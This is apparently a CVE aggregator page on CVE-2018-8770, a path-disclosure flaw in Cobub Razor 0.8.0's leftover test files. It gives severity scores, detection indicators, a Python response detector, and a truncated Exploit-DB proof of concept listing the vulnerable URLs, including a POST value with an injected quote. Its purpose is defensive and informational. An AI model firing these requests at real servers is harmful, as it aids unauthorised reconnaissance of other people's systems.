CVE-2018-8770
Published: 2018-03-18
CVE-2018-8770: Physical path Leakage exists in Western Bridge Cobub Razor 0.8.0 via generate.php, controllers/getConfigTest.php, controllers/getUpdateTest.php…
Priority: P3 · 53 · medium · 5.3 (CVSS 3.1)
Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:L / I:N / A:N
EXPLOIT
EPSS: 60.59% (99.0th percentile)
Physical path Leakage exists in Western Bridge Cobub Razor 0.8.0 via generate.php, controllers/getConfigTest.php, controllers/getUpdateTest.php, controllers/postclientdataTest.php, controllers/posterrorTest.php, controllers/posteventTest.php, controllers/posttagTest.php, controllers/postusinglogTest.php, fixtures/Controller_fixt.php, fixtures/Controller_fixt2.php, fixtures/view_fixt2.php, libs/ipTest.php, or models/commonDbfix.php in tests/.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cobub | razor | — | — |
Detection & IOCs
- HTTP GET request to /tests/generate.php returning HTTP 200 with a PHP Fatal error message disclosing the physical path is a confirmed indicator of exploitation.
- Response header or body containing the string '/application/third_party/CIUnit/libraries/CIUnitTestCase.php on line' confirms physical path leakage.
- Match both the Fatal error class-not-found string AND the CIUnitTestCase.php path string together in the response (condition: AND) to reduce false positives.
- The vulnerability is specific to Cobub Razor version 0.8.0; other versions are not confirmed affected.
- The path leakage is triggered by unauthenticated HTTP GET requests; no authentication or special headers are required, making it trivially exploitable from the internet.
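The AND condition from the indicator list, applied to recorded HTTP transactions, as an added example (not code from this page, the Nuclei template, or the Cobub Razor project). The class-not-found regex assumes PHP's usual error wording, which the page does not quote; the function names, the class name in the sample, and the sample transactions are constructed for illustration.

```python
import html
import re

# Marker string quoted in the indicator list above.
PATH_MARKER = "/application/third_party/CIUnit/libraries/CIUnitTestCase.php on line"
# Assumption: PHP's usual class-not-found wording; the page gives no exact string.
FATAL_RE = re.compile(r"Fatal error.{0,40}?Class ['\"][^'\"]+['\"] not found")
# Captures the filesystem prefix before the marker, i.e. what was disclosed.
LEAK_RE = re.compile(r"not found in ([^\r\n]*?)" + re.escape(PATH_MARKER))
TAG_RE = re.compile(r"<[^>]+>")


def leaked_path(method, path, status, body):
    """Return the disclosed install prefix if the response matches, else None."""
    if method != "GET" or status != 200 or "/tests/" not in path:
        return None
    # html_errors=On wraps the message in <b> tags; flatten before matching.
    text = html.unescape(TAG_RE.sub("", body))
    # AND condition: both strings must be present to limit false positives.
    if PATH_MARKER not in text or not FATAL_RE.search(text):
        return None
    m = LEAK_RE.search(text)
    return m.group(1) if m else ""


# Constructed sample transactions (method, path, status, body); not real traffic.
SAMPLES = [
    ("GET", "/tests/generate.php", 200,
     "<b>Fatal error</b>:  Class 'PHPUnit_Framework_TestCase' not found in "
     "<b>/srv/www/razor/application/third_party/CIUnit/libraries/"
     "CIUnitTestCase.php</b> on line <b>20</b>"),
    ("GET", "/tests/libs/ipTest.php", 404, "Not Found"),
    ("GET", "/tests/generate.php", 200,
     "Fatal error: Class 'Foo' not found in /srv/www/razor/x.php on line 3"),
    ("GET", "/index.php", 200, "<html>dashboard</html>"),
]


def scan(transactions):
    """Return (path, leaked_prefix) for every transaction that matches."""
    return [(p, leak) for m, p, s, b in transactions
            if (leak := leaked_path(m, p, s, b)) is not None]


if __name__ == "__main__":
    for path, prefix in scan(SAMPLES):
        print(f"path disclosure at {path}: install prefix {prefix!r}")
```

Any hit also means the tests/ directory is reachable from the web, so the same scan doubles as a check that the directory has been removed or blocked on a deployed instance.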
CVSS provenance
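| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 5.3 | MEDIUM | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N |
| nvd | v2.0 | 5.0 | MEDIUM | AV:N/AC:L/Au:N/C:P/I:N/A:N |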
No detection rules found.
Exploit-DB
Cobub Razor 0.8.0 - Physical Path Leakage
exploitdb·2018-04-20·CVSS 5.3
---
# Exploit Title: Cobub Razor 0.8.0 Physical path Leakage Vulnerability
# Date: 2018-04-19
# Exploit Author: Kyhvedn
# Vendor Homepage: http://www.cobub.com/
# Software Link: https://github.com/cobub/razor
# Version: 0.8.0
# CVE : CVE-2018-8770
#PoC:
URL: http://localhost/export.php
HTTP Method: GET
URL: http://localhost/index.php?/manage/channel/addchannel
HTTP Method: POST
Data: channel_name=test"&platform=1
HTTP Method: GET
http://localhost/tests/generate.php
http://localhost/tests/controllers/getConfigTest.php
http://localhost/tests/controllers/getUpdateTest.php
http://localhost/tests/controllers/postclientdataTest.php
http://localhost/tests/controllers/posterrorTest.php
http://localhost/tests/controllers/posteventTest.php
http://localh
Nuclei
Cobub Razor 0.8.0 - Information Disclosure
nuclei·CVSS 5.3
Cobub Razor 0.8.0 is susceptible to information disclosure via generate.php, controllers/getConfigTest.php, controllers/getUpdateTest.php, controllers/postclientdataTest.php, controllers/posterrorTest.php, controllers/posteventTest.php, controllers/posttagTest.php, controllers/postusinglogTest.php, fixtures/Controller_fixt.php, fixtures/Controller_fixt2.php, fixtures/view_fixt2.php, libs/ipTest.php, or models/commonDbfix.php. An attacker can obtain sensitive information, modify data, and/or execute unauthorized operations.
Template:
id: CVE-2018-8770
info:
  name: Cobub Razor 0.8.0 - Information Disclosure
  author: princechaddha
  severity: medium
  description: Cobub Razor 0.8.0 is susceptible to information disclosure via generate.php, controllers/
No writeups or analysis indexed.
Published: 2018-03-18